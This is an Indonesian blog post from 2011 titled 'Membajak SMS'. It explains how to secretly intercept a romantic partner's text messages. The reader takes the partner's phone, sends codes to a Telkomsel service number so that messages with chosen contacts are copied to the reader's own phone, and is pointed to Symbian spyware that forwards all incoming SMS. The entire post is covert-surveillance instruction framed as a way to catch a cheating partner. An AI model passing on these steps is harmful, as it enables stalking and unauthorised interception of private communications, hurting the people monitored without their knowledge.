.

Senin, 09 Mei 2011

Membajak SMS


Membajak SMS pacar Lewat Operator Telkomsel



Trik ini intinya kita dapat mengetahui isi sms apa yang pacar kita telah kirimkan ke orang lain ataupun sebaliknya isi sms apa yang telah orang kirimkan ke pacar kita. ini berlaku kepada operator telkomsel.

Pertama ambil hp pacar sebentar aja. Sebelum anda berpisah karena tujuan kerja atau kuliah di luar kota pacar anda.
Dari hp pacar kamu ketik menu kirim ke 2255, kemudian tunggu balasan dari operator telkomsel ke hp pacar kamu.


Terus balas notification dari operator telkomsel dengan mengetik 4 (copy) dan kirim kembali ke 2255 (atau ikuti perintah yang dituliskan operator telkomsel), kemudian tunggu balasan lagi dari operator telkomsel.
tekan Ok dari hp pacar kamu, ketik kembali apa yang diintrusikan operator telkomsel (pada intinya instruksi ini anda diminta memasukkan nomor si pengirim dan si penerima).
No si pengirim adalah nomor2 orang yang anda kira membahayakan bagi hubungan kalian berdua. atau dengan kata lain nomor2 mereka yang anda blacklist.
No si penerima adalah nomor anda sendiri, sehingga apapun sms yang pacar anda kirimkan ke pada mereka yang anda blacklist akan masuk ke hp anda sendiri, ataupun sebaliknya, dari mereka yang anda blacklist mengirim sms ke pacar anda, sms mereka ini akan masuk ke pacar anda.meskipun anda di kota, pacar anda di desa dan mereka yang anda blacklist berada di luar pulau , asalkan ada signal operator telkomsel.
Intinya semua sms yang masuk dan keluar dari hp pacar kamu. akan tercopy juga di hp kamu. kamu tidak perlu khawatir lagi apabila pacar kamu selingkuh atau tidak?
Bagi para pengguna operator selain Telkomsel jangan bersedih dulu, ini ada software nya. Tetapi ada syaratnya, HP anda harus berbasis symbian/S60.
Caranya:
Install ke HP anda.
Ketik nomor handphone kamu di dalam aplikasinya, lalu config semuanya sesuai yang anda inginkan.
Sms yang masuk di hape pacar akan terkirim juga ke hape anda.
download disini atau disini

Selamat mencoba.........................

Tidak ada komentar: